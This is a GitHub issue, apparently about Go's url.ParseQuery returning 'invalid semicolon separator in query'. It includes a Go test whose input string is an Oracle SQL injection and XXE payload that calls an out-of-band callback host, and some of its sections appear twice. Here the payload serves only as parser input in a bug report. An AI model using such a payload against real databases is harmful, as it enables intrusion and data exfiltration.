You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
funcTestUrlPayloads2(t*testing.T) {
out:=`var=EmptyValue'||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % awpsd SYSTEM "http://0cddnr5evws01h2bfzn5zd0cm3sxvrjv7oufi4.example'||'foo.bar/">%awpsd;`c, err:=url.ParseQuery(out)
iferr!=nil {
t.Error("failed to parse query", err)
}
ifp, ok:=c["var"]; !ok {
t.Error("Expected var to be in the map, got ", c)
} elseiflen(p) !=1||p[0] !=out {
t.Error("failed to set var")
}
}
Output: invalid semicolon separator in query
What did you expect to see?
I have tried it with many web application frameworks and languages (php, ror, nodejs) and it works as expected:
What version of Go are you using (
go version
)?Does this issue reproduce with the latest release?
Haven't tried
What operating system and processor architecture are you using (
go env
)?go env
OutputWhat did you do?
Output:
invalid semicolon separator in query
What did you expect to see?
I have tried it with many web application frameworks and languages (php, ror, nodejs) and it works as expected:
I know golang supports & and ; as separators but I think it should be changed just to & and ignore ;.
What did you see instead?
I get an empty map[string][]string and an error
The text was updated successfully, but these errors were encountered: